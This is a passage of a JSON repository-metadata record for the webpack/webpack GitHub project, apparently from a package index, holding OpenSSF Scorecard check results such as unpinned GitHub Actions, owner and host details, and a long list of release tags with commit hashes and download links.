.github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at"